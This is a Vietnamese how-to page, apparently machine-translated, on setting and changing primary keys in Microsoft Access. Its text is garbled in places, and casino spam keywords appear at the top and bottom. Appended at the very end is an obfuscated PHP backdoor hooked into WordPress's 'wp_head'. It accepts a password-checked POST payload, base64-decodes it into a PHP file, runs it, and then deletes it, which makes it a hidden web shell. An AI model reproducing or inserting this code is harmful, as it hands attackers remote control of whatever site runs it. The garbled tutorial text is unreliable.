Làm thế nào để thiết lập hoặc thay đổi các khóa chính trong một cơ sở dữ liệu Microsoft Access
jeu plinko avis pin up catcasino vavada официальный jucky jet

Làm thế nào để thiết lập hoặc thay đổi các khóa chính trong một cơ sở dữ liệu Microsoft Access

Ngày 09/10/2014 đăng bởi seo3.VS [email protected]

Khóa chính của một bảng quan hệ là chìa khóa trong đó xác định mỗi bản ghi trong một bảng duy nhất. Nó có thể là một thuộc tính bình thường có tính độc đáo được thực hiện để đảm bảo như (Số An Sinh Xã Hội) SSN vv hoặc có thể được tạo ra hoặc cung cấp bởi các DBMS (Hệ thống quản lý cơ sở dữ liệu) như GUID (trên toàn cầu duy nhất định danh) trong Microsoft SQL Server. Nó có thể bao gồm một đơn cũng như nhiều thuộc tính kết hợp.

Hãy lấy một ví dụ về một bảng EMPLOYEE có chứa một bản ghi cho mỗi người lao động duy nhất trong một tổ chức từ thấp đến vị trí cao hơn. Nhân viên độc đáo số ID của nhân viên sẽ là một khóa chính trong bảng EMPLOYEE. Họ và tên của nhân viên sẽ không có một khóa chính coz nó không thể được thực hiện để đảm bảo rằng không có hai nhân viên sẽ có tên giống nhau và cuối cùng tên.

Bây giờ tạo ra tất cả các bảng, bạn sẽ cần cho việc theo dõi của nhân viên trong một tổ chức. Hãy để bàn đầu tiên có nhân viên và nó sẽ chứa danh sách của tất cả các nhân viên với e-code (mã nhân viên, số), tên của nhân viên và Tên cùng với tắt giữa (văn bản), giới tính (văn bản 1), tuổi tác (số ) và đám đông (số).Bảng thứ hai sẽ phân biệt các vị trí nhân viên cho dù người quản lý, người làm công vv và để cho nó được e-pos.

Thay đổi khóa chính trong exelKhi bảng đã được tạo ra bây giờ nó chuyển sang thiết lập các phím chính hoặc nước ngoài. Chìa khóa chính của bảng bầu cử có thể là e-code đó sẽ là mã số duy nhất cho mỗi nhân viên.

Bước 1:

Để thiết lập một khóa chính, click vào lĩnh vực mong muốn hoặc lĩnh vực bạn muốn thực hiện. Để chọn một lĩnh vực nhấp chuột trên các lĩnh vực mong muốn hoặc trên hàng-chọn để chọn toàn bộ hàng. Theo ví dụ thực hiện trên, nhấp vào e-code và sau đó trên thanh công cụ và click vào chính để làm cho nó khóa chính.

[Dòng mà đã có dữ liệu hoặc trả về một giá trị null không thể được lựa chọn như là một khóa chính, coz MS Access sẽ không cho phép bạn làm điều đó. Nó sẽ tạo ra một tin nhắn tại thời điểm bạn lưu nó.]

Bước 2:

Nếu bạn muốn chọn nhiều số lĩnh vực, sau đó chỉ cần giữ phím Ctrl và nhấp vào chọn hàng cho mỗi lĩnh vực mà bạn muốn và sau đó trên thanh công cụ và click vào chính để làm cho nó khóa chính.

Bước 3:

Các khóa chính được thiết lập. Nếu bạn muốn thay đổi một khóa chính thực hiện theo các thủ tục tương tự như ở bước 1 và 2 Nhưng hãy chắc chắn rằng lĩnh vực bạn muốn làm cho chính không có giá trị nhân bản hoặc null. Nếu trong trường hợp bạn phải đối mặt với vấn đề như vậy, hãy làm theo bước 4.

Bước 4:

Khóa chính có thể được thiết lập cho một lĩnh vực mà đã có dữ liệu trong nó, nhưng làm như vậy tại thời điểm tiết kiệm MS Access sẽ tạo ra một tin nhắn nếu nó tìm thấy bất kỳ bản sao hoặc các giá trị null trong đó. Để sắp xếp ra tình trạng này bạn có thể cố gắng tìm câu hỏi trùng lặp để xác định vị trí các giá trị nhân bản hoặc null và sau đó chỉnh sửa các lĩnh vực theo dõi để loại bỏ chúng. Hoặc nếu không bạn có thể chọn một lĩnh vực khác nhau.

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}